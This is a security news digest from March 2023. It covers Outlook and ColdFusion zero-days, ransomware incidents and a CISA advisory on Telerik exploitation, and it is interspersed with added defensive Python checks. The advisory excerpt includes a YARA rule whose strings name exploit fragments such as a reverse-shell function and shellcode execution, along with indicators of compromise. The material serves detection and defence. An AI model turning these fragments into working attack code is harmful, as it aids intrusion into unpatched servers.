                It’s March 2023 Patch Tuesday, and Microsoft has delivered fixes for 74 CVE-numbered vulnerabilities, including two actively exploited in the wild (CVE-2023-23397, CVE-2023-24880) by different threat actors. About CVE-2023-23397 “CVE-2023-23397 is a critical EoP vulnerability in Microsoft Outlook that is triggered when an attacker sends a message with an extended MAPI property with a UNC path to an SMB (TCP 445) share on a threat actor-controlled server. No user interaction is required,” Microsoft explained. “The … More

                The post Microsoft patches zero-days used by state-sponsored and ransomware threat actors (CVE-2023-23397, CVE-2023-24880) appeared first on Help Net Security.

                "

                Autosummary: “Microsoft Threat Intelligence assesses that a Russia-based threat actor used the exploit patched in CVE-2023-23397 in targeted attacks against a limited number of organizations in government, transportation, energy, and military sectors in Europe,” the company said, and shared a script that organizations can use to check if they have been among the targets. "
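The two Outlook entries above describe the trigger: a message carrying an extended MAPI property whose value is a UNC path to an SMB share, which makes Outlook authenticate (and leak an NTLM hash) to the attacker's host with no user interaction. The script Microsoft shared looks for such property values; the code below is an added triage example, not Microsoft's script and not from either article. It assumes the property in question is the reminder sound file parameter (PidLidReminderFileParameter, a name taken from public write-ups rather than from this page), takes already-extracted property values as plain strings, and uses a hypothetical internal DNS suffix and a constructed set of sample values.

```python
"""
Added example (not Microsoft's detection script): classify Outlook reminder
sound-file property values the way a mailbox triage pass would.

CVE-2023-23397 fires when the property holds a UNC path to an SMB share on an
attacker-controlled host (TCP 445).  The heuristic here is this example's own:
any UNC path whose host is outside the organisation is an NTLM-leak candidate.
"""
import re
from ipaddress import ip_address

# DNS suffixes the organisation owns.  Assumption for the example.
INTERNAL_SUFFIXES = (".corp.example",)

# Constructed sample property values, as if pulled from mailbox items.
SAMPLE_ITEMS = {
    "item-1": r"\\files.attacker.example\reminder\sound.wav",   # external host
    "item-2": r"\\?\UNC\10.20.30.40\share\alert.wav",           # long-UNC, RFC1918
    "item-3": r"\\fileserver.corp.example\sounds\ding.wav",     # our own server
    "item-4": r"C:\Windows\Media\Windows Notify.wav",           # local file
    "item-5": "",                                               # property unset
}

# Matches \\host\share and the \\?\UNC\host\share long-path form.
_UNC_RE = re.compile(r"^\\\\(?:\?\\UNC\\)?([^\\]+)\\", re.IGNORECASE)


def remote_host(value: str):
    """Return the host Outlook would connect to for this value, or None."""
    m = _UNC_RE.match(value)
    return m.group(1).lower() if m else None


def is_internal(host: str) -> bool:
    """Private/loopback addresses and our own DNS suffixes count as internal."""
    try:
        return ip_address(host).is_private
    except ValueError:  # not an IP literal, so compare DNS suffixes
        return host.endswith(INTERNAL_SUFFIXES)


def classify(value: str) -> str:
    """'benign' for local or unset paths, 'internal-unc' for our own hosts,
    'ntlm-leak-candidate' for a UNC path pointing outside the organisation."""
    host = remote_host(value)
    if host is None:
        return "benign"
    return "internal-unc" if is_internal(host) else "ntlm-leak-candidate"


def triage(items: dict) -> dict:
    """Map item id -> verdict for a batch of extracted property values."""
    return {item: classify(value) for item, value in items.items()}


if __name__ == "__main__":
    for item, verdict in triage(SAMPLE_ITEMS).items():
        print(item, verdict)
```

A hit is only a candidate: the property can legitimately point at an internal file server, and an attacker can also use an internal host they already control, so the verdict is a triage priority, not proof. The fix remains the patch; blocking outbound TCP 445 at the perimeter removes the external-share variant while patching is rolled out.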


                Adobe fixed ColdFusion flaw listed as under active exploit

                exploits
                2023-03-14 https://securityaffairs.com/143479/security/adobe-cold-fusion-exploited-bug.html

                Adobe is warning that a critical zero-day flaw in ColdFusion web app development platform was exploited in very limited attacks. Software giant Adobe released security updates for ColdFusion versions 2021 and 2018 to resolve a critical flaw, tracked as CVE-2023-26360 (CVSS base score 8.6), that was exploited in very limited attacks. “Adobe is aware that CVE-2023-26360 has been […]

                The post Adobe fixed ColdFusion flaw listed as under active exploit appeared first on Security Affairs.

                "

                Autosummary: "


                Clop ransomware is victimizing GoAnywhere MFT customers

                exploits ransomware
                2023-03-14 https://www.malwarebytes.com/blog/news/2023/03/clop-ransomware-is-victimizing-goanywhere-mft-customers

                Categories: Exploits and vulnerabilities

                Categories: News

                Categories: Ransomware

                Tags: Clop

                Tags: ransomware

                Tags: GoAnywhere

                Tags: CVE-2023-0669

The Clop ransomware gang has claimed responsibility for attacking several GoAnywhere MFT customers by exploiting a vulnerability in the managed file transfer software's administrative interface.

                (Read more...)

                The post Clop ransomware is victimizing GoAnywhere MFT customers appeared first on Malwarebytes Labs.

                "

Autosummary: After:
<!-- Add these tags to comment out the following section (as shown) or simply delete this section if you are not familiar with XML comments
<servlet>
    <servlet-name>License Response Servlet</servlet-name>
    <servlet-class>com.linoma.ga.ui.admin.servlet.LicenseResponseServlet</servlet-class>
    <load-on-startup>0</load-on-startup>
</servlet>
<servlet-mapping>
    <servlet-name>Licenses Response Servlet</servlet-name>
    <url-pattern>/lic/accept/</url-pattern>
</servlet-mapping>
-->
Restart the GoAnywhere MFT application. If GoAnywhere MFT is clustered, this change needs to happen on every instance node in the cluster. "
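The workaround above relies on an administrator editing web.xml by hand on every node, so it is worth verifying rather than trusting. The following is an added example, not code from Malwarebytes or Fortra: it parses a deployment descriptor and reports whether the /lic/accept/ endpoint is still mapped. Anything inside an XML comment never reaches the parser, so a correctly commented-out section simply disappears. The two web.xml fragments are constructed for the example (a real GoAnywhere web.xml carries many more servlets); the namespace-tolerant matching is there because descriptors usually declare a default namespace.

```python
"""
Added example (not from the post or the vendor): confirm the License Response
Servlet workaround for CVE-2023-0669 was applied by checking which url-patterns
are still live in web.xml.
"""
import xml.etree.ElementTree as ET

# Constructed "before" descriptor: the vulnerable endpoint is mapped.
BEFORE = """<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee">
  <servlet>
    <servlet-name>License Response Servlet</servlet-name>
    <servlet-class>com.linoma.ga.ui.admin.servlet.LicenseResponseServlet</servlet-class>
    <load-on-startup>0</load-on-startup>
  </servlet>
  <servlet-mapping>
    <servlet-name>License Response Servlet</servlet-name>
    <url-pattern>/lic/accept/</url-pattern>
  </servlet-mapping>
  <servlet-mapping>
    <servlet-name>Admin</servlet-name>
    <url-pattern>/admin/*</url-pattern>
  </servlet-mapping>
</web-app>
"""

# Constructed "after" descriptor: the same section wrapped in an XML comment.
AFTER = """<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee">
  <!-- Workaround: section disabled
  <servlet>
    <servlet-name>License Response Servlet</servlet-name>
    <servlet-class>com.linoma.ga.ui.admin.servlet.LicenseResponseServlet</servlet-class>
    <load-on-startup>0</load-on-startup>
  </servlet>
  <servlet-mapping>
    <servlet-name>License Response Servlet</servlet-name>
    <url-pattern>/lic/accept/</url-pattern>
  </servlet-mapping>
  -->
  <servlet-mapping>
    <servlet-name>Admin</servlet-name>
    <url-pattern>/admin/*</url-pattern>
  </servlet-mapping>
</web-app>
"""


def _local(tag: str) -> str:
    """Strip a '{namespace}' prefix so matching works with or without xmlns."""
    return tag.rsplit("}", 1)[-1]


def active_url_patterns(web_xml: str) -> set:
    """Return every url-pattern inside a live servlet-mapping element.
    Commented-out mappings are not part of the parsed tree, so they are absent."""
    root = ET.fromstring(web_xml)
    patterns = set()
    for element in root.iter():
        if _local(element.tag) != "servlet-mapping":
            continue
        for child in element:
            if _local(child.tag) == "url-pattern" and child.text:
                patterns.add(child.text.strip())
    return patterns


def license_servlet_exposed(web_xml: str) -> bool:
    """True when /lic/accept/ is still reachable through the descriptor."""
    return "/lic/accept/" in active_url_patterns(web_xml)


if __name__ == "__main__":
    for label, doc in (("before", BEFORE), ("after", AFTER)):
        print(label, "exposed" if license_servlet_exposed(doc) else "mitigated")
```

Run it against the web.xml of each node in a cluster, since the post notes the change must be made on every instance; a node that still reports "exposed" was missed. The check covers only the mapping; the real fix is the patched GoAnywhere release.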


                LockBit Ransomware gang claims to have stolen SpaceX confidential data from Maximum Industries

                exploits ransomware
                2023-03-14 https://securityaffairs.com/143495/cyber-crime/lockbit-ransomware-gang-spacex-files.html

                The LockBit ransomware group claims to have stolen confidential data belonging to SpaceX from the systems of Maximum Industries. The LockBit ransomware gang claims to have stolen confidential data of SpaceX after they hacked the systems of production company Maximum Industries. Maximum Industries is a full-service, piece-part production, and contract manufacturing facility. The ransomware gang […]

                The post LockBit Ransomware gang claims to have stolen SpaceX confidential data from Maximum Industries appeared first on Security Affairs.

                "

                Autosummary: "


                Microsoft Patch Tuesday fix Outlook zero-day actively exploited

                exploits
                2023-03-14 https://securityaffairs.com/143486/security/microsoft-patch-tuesday-march-2023.html

                Microsoft Patch Tuesday updates for March 2023 addressed 74 vulnerabilities, including a Windows zero-day exploited in ransomware attacks. Microsoft Patch Tuesday security updates for March 2023 addressed 74 new vulnerabilities in Microsoft Windows and Windows Components; Office and Office Components; Edge (Chromium-based); Microsoft Dynamics; Visual Studio; and Azure. Six of the fixed issues are rated […]

                The post Microsoft Patch Tuesday fix Outlook zero-day actively exploited appeared first on Security Affairs.

                "

Autosummary: "


                Understanding password behavior key to developing stronger cybersecurity protocols

                ciber
                2023-03-13 https://www.helpnetsecurity.com/2023/03/13/understanding-password-behavior/

                Passwords are still the weakest link in an organization’s network, as proven by the analysis of over 800 million breached passwords, according to Specops Software. The study found 88% of passwords used in successful attacks consisted of 12 characters or less, with the most common being 8 characters (24%). The most common base terms used in passwords were: ‘password’, ‘admin’, ‘welcome’ and ‘p@ssw0rd’. Passwords containing only lowercase letters were the most common character combination found, … More

                The post Understanding password behavior key to developing stronger cybersecurity protocols appeared first on Help Net Security.

                "

                Autosummary: Strong password policy enforcement In Nvidia’s data breach in 2022, where thousands of employee passwords were leaked, many employees had used passwords such as ‘Nvidia’, ‘qwerty’ and ‘nvidia3d’. "


                UK firms await government help after US bank collapse

                financial government
                2023-03-13 https://www.bbc.co.uk/news/business-64934351?at_medium=RSS&at_campaign=KARANGA
                The government is expected to announce support for companies after Silicon Valley Bank went bust. "

                Autosummary: "


                Silicon Valley Bank: Money in failed US bank is safe - US government

                financial government
                2023-03-13 https://www.bbc.co.uk/news/world-us-canada-64935170?at_medium=RSS&at_campaign=KARANGA
                Depositors with Silicon Valley Bank can access all their money from Monday, US officials say. "

                Autosummary: "


                TSA issues additional cybersecurity rules for the aviation sector

                ciber
                2023-03-13 https://www.helpnetsecurity.com/2023/03/13/tsa-cybersecurity-aviation/

                The Transportation Security Administration (TSA) issued a new cybersecurity amendment to the security programs of certain TSA-regulated (airport and aircraft) operators in the aviation sector, following similar measures announced in October 2022 for passenger and freight railroad carriers. This is part of the Department of Homeland Security’s efforts to increase the cybersecurity resilience of U.S. critical infrastructure and follows extensive collaboration with aviation partners. “Protecting our nation’s transportation system is our highest priority and TSA … More

                The post TSA issues additional cybersecurity rules for the aviation sector appeared first on Help Net Security.

                "

                Autosummary: "


                Fighting financial fraud through fusion centers

                financial
                2023-03-13 https://www.helpnetsecurity.com/2023/03/13/fighting-financial-fraud-through-fusion-centers/

                Keeping up with financial fraud is incredibly difficult because accurate fraud detection requires a deep, real-time analysis of all the events surrounding a transaction. Consider a typical payment transaction: A single transfer of funds to a new payee may not raise suspicion, but when authentication records show a discrepancy between the account owner’s usual geographic location and that of several device logins from multiple IP addresses in the same time frame, the transfer should be … More

                The post Fighting financial fraud through fusion centers appeared first on Help Net Security.

                "

Autosummary: In an ideal world, firms can use the fusion centers to centralize transactional data from ledgers, databases, and/or the mainframe – including watchlists and external data. Algorithms are developed to understand fraud patterns and intelligently scan, predict, and stop fraudulent activity before it occurs, but they’re only ever as good as the data with which they are built. "


                KamiKakaBot Malware Used in Latest Dark Pink APT Attacks on Southeast Asian Targets

                exploits
                2023-03-13 https://thehackernews.com/2023/03/kamikakabot-malware-used-in-latest-dark.html
                The Dark Pink advanced persistent threat (APT) actor has been linked to a fresh set of attacks targeting government and military entities in Southeast Asian countries with a malware called KamiKakaBot. Dark Pink, also called Saaiwc, was first profiled by Group-IB earlier this year, describing its use of custom tools such as TelePowerBot and KamiKakaBot to run arbitrary commands and exfiltrate "

                Autosummary: "The use of legitimate web services as a command-and-control (C2) server, such as Telegram, remains the number one choice for different threat actors, ranging from regular cyber criminals to advanced persistent threat actors," the Amsterdam-based company said. "


                Warning: AI-generated YouTube Video Tutorials Spreading Infostealer Malware

                exploits
                2023-03-13 https://thehackernews.com/2023/03/warning-ai-generated-youtube-video.html
                Threat actors have been increasingly observed using AI-generated YouTube Videos to spread a variety of stealer malware such as Raccoon, RedLine, and Vidar. "The videos lure users by pretending to be tutorials on how to download cracked versions of software such as Photoshop, Premiere Pro, Autodesk 3ds Max, AutoCAD, and other products that are licensed products available only to paid users," "

                Autosummary: The development comes amid a surge in new information stealer variants like SYS01stealer, S1deload, Stealc, Titan, ImBetter, WhiteSnake, and Lumma that are offered for sale and come with capabilities to plunder sensitive data under the guise of popular apps and services. "


                HSBC swoops in to rescue UK arm of Silicon Valley Bank

                financial
                2023-03-13 https://www.bbc.co.uk/news/business-64937251?at_medium=RSS&at_campaign=KARANGA
                The Bank of England and government worked all night to secure a deal involving no taxpayer money. "

                Autosummary: "


                STALKER 2 game developer hacked by Russian hacktivists, data stolen

                rusia-ucrania
                2023-03-13 https://www.bleepingcomputer.com/news/security/stalker-2-game-developer-hacked-by-russian-hacktivists-data-stolen/
                GSC Game World, the developer of the highly-anticipated "STALKER 2: Heart of Chornobyl" game, warned their systems were breached, allowing threat actors to steal game assets during the attack. [...] "

                Autosummary: Hackers complain about firm’s stance The hackers posted a message on the Russian social media platform VK, claiming to have stolen a “vast amount of STALKER 2 material,” including the entire storyline, cutscene descriptions, concept art, global maps, and more. "


                Silicon Valley Bank: Lessons learned from failed "tech bank"

                financial
                2023-03-13 https://www.bbc.co.uk/news/technology-64939556?at_medium=RSS&at_campaign=KARANGA
                The BBC talks to some of the UK-based tech firms which had accounts with Silicon Valley Bank. "

                Autosummary: "


                LA housing authority discloses data breach after ransomware attack

                financial exploits ransomware
                2023-03-13 https://www.bleepingcomputer.com/news/security/la-housing-authority-discloses-data-breach-after-ransomware-attack/
                The Housing Authority of the City of Los Angeles (HACLA) is warning of a "data security event" after the LockBit ransomware gang targeted the organization and leaked data stolen in the attack. [...] "

                Autosummary: "


                CISA to warn critical infrastructure of ransomware-vulnerable devices

                exploits ransomware
                2023-03-13 https://www.bleepingcomputer.com/news/security/cisa-to-warn-critical-infrastructure-of-ransomware-vulnerable-devices/
                Today, the U.S. Cybersecurity & Infrastructure Security Agency (CISA) announced a new pilot program designed to help critical infrastructure entities protect their information systems from ransomware attacks. [...] "

                Autosummary: "


                Hackers steal $197 million in crypto in Euler Finance attack

                financial
                2023-03-13 https://www.bleepingcomputer.com/news/security/hackers-steal-197-million-in-crypto-in-euler-finance-attack/
                Lending protocol Euler Finance was hit by a cryptocurrency flash loan attack on Sunday, with the threat actor stealing $197 million in multiple digital assets. [...] "

                Autosummary: The cryptocurrency theft involved multiple tokens, including $8.75 million worth of DAI, $18.5 million in WBTC, $33.85 million in USDC, and $135.8 million in stETH. "


                Frustrated migrants storm border between Mexico and El Paso, Texas

                latam
                2023-03-13 https://www.bbc.co.uk/news/world-us-canada-64921872?at_medium=RSS&at_campaign=KARANGA
                Hundreds of people, mostly Venezuelans, were met with barbed wire and police in riot gear. "

                Autosummary: "


                Fortinet: New FortiOS bug used as zero-day to attack govt networks

                exploits
                2023-03-13 https://www.bleepingcomputer.com/news/security/fortinet-new-fortios-bug-used-as-zero-day-to-attack-govt-networks/
                Unknown attackers used zero-day exploits to abuse a new FortiOS bug patched this month in attacks targeting government and large organizations that have led to OS and file corruption and data loss. [...] "

                Autosummary: In January, Fortinet disclosed a very similar series of incidents where a FortiOS SSL-VPN vulnerability patched in December 2022 and tracked as CVE-2022-42475 was also used as a zero-day bug to target government organizations and government-related entities. "


                CISA now warns critical infrastructure of ransomware-vulnerable devices

                exploits ransomware
                2023-03-13 https://www.bleepingcomputer.com/news/security/cisa-now-warns-critical-infrastructure-of-ransomware-vulnerable-devices/
                Today, the U.S. Cybersecurity & Infrastructure Security Agency (CISA) announced a new pilot program designed to help critical infrastructure entities protect their information systems from ransomware attacks. [...] "

                Autosummary: "


                "Brad Pitt," a still body, ketchup, and a knife, or the best trick ever played on a romance scammer, with Becky Holmes: Lock and Code S04E06

                financial
                2023-03-13 https://www.malwarebytes.com/blog/podcast/2023/03/brad-pitt-a-dead-body-and-a-knife-or-romance-scam-tricks-with-becky-holmes

                Categories: Podcast

                This week on Lock and Code, we speak with author and Twitter pro Becky Holmes about how she teases, fights, and shuts down online romance scammers.

                (Read more...)

                The post "Brad Pitt," a still body, ketchup, and a knife, or the best trick ever played on a romance scammer, with Becky Holmes: Lock and Code S04E06 appeared first on Malwarebytes Labs.

                "

Autosummary: Worse, romance scammers themselves often target vulnerable people, including seniors, widows, and the recently divorced, and they show no remorse when developing long-lasting online relationships, all built on lies, so that they can emotionally manipulate their victims into handing over hundreds or thousands of dollars. For a couple of years now, Holmes has teased, mocked, strung along, and shut down online romance scammers, much of her work in public view as she shares some of her more exciting stories on Twitter. "


                Breast cancer photos published by ransomware gang

                exploits ransomware
                2023-03-13 https://www.malwarebytes.com/blog/news/2023/03/breast-cancer-photos-published-by-ransomware-gang

                Categories: News

                Categories: Ransomware

                Tags: ALPHV

                Tags: BlackCat

                Tags: Lehigh Valley Health Network

                Tags: LVHN

                Russia-linked ransomware group ALPHV has leaked the data it stole from Lehigh Valley Health Network, including clinical photos of women undergoing breast cancer treatment.

                (Read more...)

                The post Breast cancer photos published by ransomware gang appeared first on Malwarebytes Labs.

                "

                Autosummary: The Russia-linked ALPHV ransomware group, also known as BlackCat, has posted sensitive clinical photos of breast cancer patients—calling them "nude photos"—to extort money from the Lehigh Valley Health Network (LVHN). "This unconscionable criminal act takes advantage of patients receiving cancer treatment, and LVHN condemns this despicable behavior," LVHN spokesman Brian Downs said, Lehigh Valley News reported. "


                5 signs you’ve fallen for a scam – and what to do next

                financial
                2023-03-13 https://www.welivesecurity.com/2023/03/13/signs-scam-how-tell-what-do-next/

                Here’s how to know you have fallen victim to a scam – and what to do in order to undo or mitigate the damage.

                The post 5 signs you’ve fallen for a scam – and what to do next appeared first on WeLiveSecurity

                "

Autosummary: This personal data will be bought in large quantities and then used in automated attacks including follow-on phishing, payment fraud, account takeover or new account fraud (NAF). Except there is no stock and they simply take the buyer’s money, requesting payment via instant cash apps like Zelle, Venmo and Cash App, which offer no buyer protection. In 2021, US consumers reported losing nearly US$6bn to fraud, up 70% on the previous year, according to the FTC. Instagram accounts are worth $45 each, as opposed to $2 for a social security number, according to one report. "


                CISA adds Plex Media Server bug, exploited in LastPass attack, to Known Exploited Vulnerabilities Catalog

                exploits
                2023-03-13 https://securityaffairs.com/143429/security/cisa-plex-media-server-bug-known-exploited-vulnerabilities-catalog.html

                US CISA added remote code execution vulnerability in Plex Media Server to its Known Exploited Vulnerabilities Catalog. U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a remote code execution (RCE) vulnerability in the Plex Media Server, tracked as CVE-2020-5741 (CVSS score: 7.2), to its Known Exploited Vulnerabilities Catalog. The three-year-old high-severity flaw is a deserialization of […]

                The post CISA adds Plex Media Server bug, exploited in LastPass attack, to Known Exploited Vulnerabilities Catalog appeared first on Security Affairs.

                "

Autosummary: "


Threat Actors Exploit Progress Telerik Vulnerability in U.S. Government IIS Server

                exploits government ciber
                2023-03-13 https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-074a

                SUMMARY

                From November 2022 through early January 2023, the Cybersecurity and Infrastructure Security Agency (CISA) and authoring organizations identified the presence of indicators of compromise (IOCs) at a federal civilian executive branch (FCEB) agency. Analysts determined that multiple cyber threat actors, including an APT actor, were able to exploit a .NET deserialization vulnerability (CVE-2019-18935) in Progress Telerik user interface (UI) for ASP.NET AJAX, located in the agency’s Microsoft Internet Information Services (IIS) web server. Successful exploitation of this vulnerability allows for remote code execution. According to Progress Software, Telerik UI for ASP.NET AJAX builds before R1 2020 (2020.1.114) are vulnerable to this exploit.[1]

                Actions to take today to mitigate malicious cyber activity:

                • Implement a patch management solution to ensure compliance with the latest security patches.
                • Validate output from patch management and vulnerability scanning against running services to check for discrepancies and account for all services.
                • Limit service accounts to the minimum permissions necessary to run services.

                CISA, the Federal Bureau of Investigation (FBI), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint Cybersecurity Advisory (CSA) to provide IT infrastructure defenders with tactics, techniques, and procedures (TTPs), IOCs, and methods to detect and protect against similar exploitation.


Autosummary: Overview CISA and authoring organizations assess that, beginning as late as November 2022, threat actors successfully exploited a .NET deserialization vulnerability (CVE-2019-18935) in an instance of Telerik UI for ASP.NET AJAX Q2 2013 SP1 (version 2013.2.717) running on an FCEB agency’s Microsoft IIS server. In addition to CVE-2019-18935, this version (2013.2.717) of Telerik UI for ASP.NET AJAX contains the following known vulnerabilities: CVE-2017-11357, CVE-2017-11317, and CVE-2017-9248.

Figure 1: Threat Actor Assembly Installer

As presented by Bishop Fox and proven during authoring organizations’ investigation of IIS server logs, an exception does not mean that the exploit failed, but more likely that it executed successfully.[3]
Web.UI.WebResource.axd, [*redacted*], False, [*redacted*], 15, [*redacted*], False, at Telerik.

All of the analyzed samples have network parameters, including host name, domain name, Domain Name System (DNS) server Internet Protocol (IP) address and machine name, Network Basic Input/Output System (NetBIOS) ID, adapter information, IP address, subnet, gateway IP, and Dynamic Host Configuration Protocol (DHCP) server [T1016]. TA1’s malware gathers network parameters, including host name, domain name, DNS servers, NetBIOS ID, adapter information, IP address, subnet, gateway IP, and DHCP server.

Example Regex: \d{10}\.\d{1,8}\.dll
These numbers can be copied and translated from digits into readable language with the month, day, year, hour, minute, and seconds displayed. For example, file 1596835329.5015914.png, which decodes to August 7, 2020, 21:22:09 UTC, first appeared on October 13, 2022, but the file system shows a creation date of August 7, 2020.

Log Type: Windows Event Application Logs
Location: %SystemDrive%\Windows\System32\winevt\logs\Application.evtx
Kroll Artifact Parser and Extractor (KAPE), a forensic artifact collector and parser, was used to extract the Windows event logs from a backup image of the compromised IIS server. If a Werfault crash report was written, Windows event application logs may contain evidence of this, even if the DLLs have been removed from the system as part of a cleanup effort by the threat actors. The EventID field maps to Windows EventIDs for an easy filter.

Application Error
| 1664175639.65719.dll | c:\windows\system32\inetsrv\w3wp.exe | C:\Windows\Temp\1664175639.65719.dll
{"EventData":{"Data":"w3wp.exe, 8.5.9600.16384, 5215df96, 1664175639.65719.dll, 0.0.0.0, 63314d94, c00000fd, 00000000000016f8, 1708, 01d8d0a5f84af443, c:\\windows\\system32\\inetsrv\\w3wp.exe, C:\\Windows\\Temp\\1664175639.65719.dll, eed89eeb-3d68-11ed-817c-005056990ed7","Binary":""}}
1001 w3wp.exe

Application Crash
{"EventData":{"Data":"0, APPCRASH, Not available, 0, w3wp.exe, 8.5.9600.16384, 5215df96, 1664175639.65719.dll, 0.0.0.0, 63314d94, c00000fd, 00000000000016f8, C:\\Windows\\Temp\\WERE3F6.tmp.appcompat.txt C:\\Windows\\Temp\\WERE639.tmp.WERInternalMetadata.xml C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_w3wp.exe_d538da447d49df5862c37684118d0c25c2eff_9e3fd63b_cab_0c3ee656\\memory.hdmp C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_w3wp.exe_d538da447d49df5862c37684118d0c25c2eff_9e3fd63b_cab_0c3ee656\\triagedump.dmp, C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_w3wp.exe_d538da447d49df5862c37684118d0c25c2eff_9e3fd63b_cab_0c3ee656, 0, eed89eeb-3d68-11ed-817c-005056990ed7, 4","Binary":""}}

Table 5: Four Fields Searched in IIS Logs (these descriptions are sourced directly from Microsoft.[6])
General Name | Field Name   | Description
Method       | cs-method    | Requested action; for example, a GET method
URI Stem     | cs-uri-stem  | Universal Resource Identifier (URI), or target, of the action
URI Query    | cs-uri-query | The query, if any, that the client was trying to perform; a URI query is necessary only for dynamic pages.

rule CISA_10424018_01
{
    meta:
        Author = "CISA Code & Media Analysis"
        Incident = "10424018"
        Date = "2023-02-07"
        Last_Modified = "20230216_1500"
        Actor = "n/a"
        Family = "n/a"
        Capabilities = "n/a"
        Malware_Type = "n/a"
        Tool_Type = "n/a"
        Description = "Detects open-source exploit samples"
        SHA256 = "n/a"
    strings:
        $s0 = { 3D 20 7B 20 22 63 6D 22 2C 20 22 64 2E 65 22 2C }   // = { "cm", "d.e",
        $s1 = { 20 22 78 22 2C 20 22 65 22 20 7D 3B }               //  "x", "e" };
        $s2 = { 52 65 76 65 72 73 65 53 68 65 6C 6C 28 29 }         // ReverseShell()
        $s3 = { 54 65 6C 65 72 69 6B 20 55 49 }                     // Telerik UI
        $s4 = { 66 69 6C 65 6E 61 6D 65 5F 6C 6F 63 61 6C }         // filename_local
        $s5 = { 66 69 6C 65 6E 61 6D 65 5F 72 65 6D 6F 74 65 }      // filename_remote
        $s6 = { 41 55 43 69 70 68 65 72 2E 65 6E 63 72 79 70 74 }   // AUCipher.encrypt
        $s7 = { 31 32 31 66 61 65 37 38 31 36 35 62 61 33 64 34 }   // 121fae78165ba3d4
        $s8 = { 43 6F 6E 6E 65 63 74 53 74 61 67 69 6E 67 53 65 72 76 65 72 28 29 }   // ConnectStagingServer()
        $s9 = { 53 74 61 67 69 6E 67 53 65 72 76 65 72 53 6F 63 6B 65 74 }            // StagingServerSocket
        $s10 = { 2A 62 75 66 66 65 72 20 3D 20 28 75 6E 73 69 67 6E 65 }              // *buffer = (unsigne
        $s11 = { 28 2A 29 28 29 29 62 75 66 66 65 72 3B 0A 20 20 20 20 66 75 6E 63 28 29 3B }   // (*)())buffer;\n    func();
        $s12 = { 75 70 6C 6F 61 64 28 70 61 79 6C 6F 61 64 28 54 65 6D 70 54 61 72 67 65 74 }   // upload(payload(TempTarget
        $s13 = { 36 32 36 31 36 66 33 37 37 35 36 66 32 66 }                                   // 62616f37756f2f
    condition:
        ($s0 and $s1 and $s2) or ($s3 and $s4 and $s5 and $s6 and $s7) or ($s8 and $s9 and $s10 and $s11) or ($s12 and $s13)
}

Log Collection, Retention, and Analysis CISA, FBI, and MS-ISAC recommend that organizations utilize a centralized log collection and monitoring capability, as well as implement or increase logging and forensic data retention.

Other Best Practice Mitigation Recommendations Implement phishing-resistant multifactor authentication (MFA) for as many services possible, particularly for webmail, virtual private networks (VPNs), accounts that access critical systems, and privileged accounts that manage backups. [CPG 3.1, 3.2] Evaluate user permissions and maintain separate user accounts for all actions and activities not associated with the administrator role, e.g., for business email, web browsing, etc.

VALIDATE SECURITY CONTROLS In addition to applying mitigations, CISA, FBI, and MS-ISAC recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory.

ACKNOWLEDGEMENTS Google’s Threat Analysis Group (TAG) contributed to this CSA.

Proof-of-Concept Exploit for CVE-2019-18935
[6] Microsoft: Configure Logging in IIS
[7] GitHub: CVE-2019-18935 "
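The advisory's hunting guidance comes down to two things a defender can automate: the exploit drops DLLs whose names are a Unix epoch plus a fractional suffix (the regex \d{10}\.\d{1,8}\.dll), and when such a DLL crashes inside w3wp.exe, the Windows Error Reporting entries in the Application log keep the file name and its C:\Windows\Temp path after the attacker deletes the file. The code below is an added example, not part of the CISA advisory or the page: it decodes the timestamps and flags matching w3wp.exe crash events. The event records are constructed for the example, modelled on the advisory's sample (the identifiers are not real).

```python
"""
Added example (not from the CISA advisory): find timestamp-named exploit
artefacts in Windows Application event data and decode the epoch in the name.
"""
import re
from datetime import datetime, timezone

# The advisory's \d{10}\.\d{1,8}\.dll pattern, widened to .png because it also
# dates a 1596835329.5015914.png file the same way.
TIMESTAMP_NAME = re.compile(r"\b(\d{10})\.(\d{1,8})\.(dll|png)\b", re.IGNORECASE)

# Path that marks the staging location the advisory reports for the DLLs.
TEMP_DIR = re.compile(r"\\windows\\temp\\", re.IGNORECASE)

# Constructed Application log records (EventID 1000 = Application Error).
# The first is modelled on the advisory's w3wp.exe sample; the second is benign.
SAMPLE_EVENTS = [
    {"EventID": 1000,
     "Data": r"w3wp.exe, 8.5.9600.16384, 5215df96, 1664175639.65719.dll, 0.0.0.0, "
             r"63314d94, c00000fd, 00000000000016f8, 1708, 01d8d0a5f84af443, "
             r"c:\windows\system32\inetsrv\w3wp.exe, "
             r"C:\Windows\Temp\1664175639.65719.dll, eed89eeb-3d68-11ed-817c-005056990ed7"},
    {"EventID": 1000,
     "Data": r"notepad.exe, 10.0.19041.1, 00000000, ntdll.dll, 10.0.19041.1, 00000000, "
             r"c0000005, 0000000000001234, 2000, 01d8d0a5f84af443, "
             r"C:\Windows\System32\notepad.exe, C:\Windows\System32\ntdll.dll, "
             r"00000000-0000-0000-0000-000000000000"},
]


def decode_epoch(seconds: str) -> datetime:
    """Translate the 10-digit prefix into a UTC timestamp (the time the
    attacker's tooling generated the file name)."""
    return datetime.fromtimestamp(int(seconds), tz=timezone.utc)


def find_timestamp_names(text: str) -> list:
    """Return (filename, decoded UTC time) for every timestamp-named file in text."""
    return [(m.group(0), decode_epoch(m.group(1))) for m in TIMESTAMP_NAME.finditer(text)]


def crash_indicators(events: list) -> list:
    """Flag events where w3wp.exe faulted in a timestamp-named module that was
    loaded from C:\\Windows\\Temp.  Each module is reported once per event even
    though the record names it twice (faulting module and full path)."""
    flagged = []
    for event in events:
        data = event["Data"]
        if "w3wp.exe" not in data.lower() or not TEMP_DIR.search(data):
            continue
        seen = {}
        for name, when in find_timestamp_names(data):
            seen.setdefault(name, when)
        for name, when in seen.items():
            flagged.append({"EventID": event["EventID"], "module": name,
                            "generated_utc": when.isoformat()})
    return flagged


if __name__ == "__main__":
    for hit in crash_indicators(SAMPLE_EVENTS):
        print(hit)
```

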